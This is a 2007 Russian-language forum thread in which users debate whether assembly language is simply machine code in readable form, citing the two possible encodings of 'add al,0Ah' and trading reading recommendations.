Я тут на форуме не появляюсь, т.к. учёба и гулянки всё время отнимают+хочется что-нибудь самому почитать, а не другим рассказать=). Но этот спор я пропустить не мог.
Alaget, жжёшь=) No comment.
quote:
синтаксис ассемблера это и есть запись машинных кодов в более понятной форме….
Не совсем, например add al,0Ah- это "04h 0Ah" или "80h C0h 0Ah" что выберет компилятор знает только он сам(хотя там есть какая-то директива, ассемблерщики точно скажут).
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 20:20:09.846666
|
|
|
Necromancer13
Сообщений: 146
Оценки: 0
Присоединился: 2007-06-28 02:00:57.563333
|
quote:
Не совсем, например add al,0Ah- это "04h 0Ah" или "80h C0h 0Ah" что выберет компилятор знает только он сам(хотя там есть какая-то директива, ассемблерщики точно скажут).
в статье Криса Касперски это вычитал?:D
я это знаю… но в основном оно есть так, как я сказал:)
|
|
|
|
|
RE: [Как]поглумится над ламером - 2007-11-13 20:26:08.340000
|
|
|
Inspektor
Сообщений: 143
Оценки: 0
Присоединился: 2007-08-31 11:37:20.710000
|
quote:
в статье Криса Касперски это вычитал?:D
возможно… как говориться:"это было давно и не правда":D. Я как-то больше с wasm.ru и rootkits.ru/.com читаю, из хакера только "Крыса". А вообще рекоммендую книжки, там всё в куче и понятнее, правда времени много надо тратить.
Но согласись, что это вещь не очевидная и, например, Alaget этого точно не знает;).
|
|
|
|
|
|
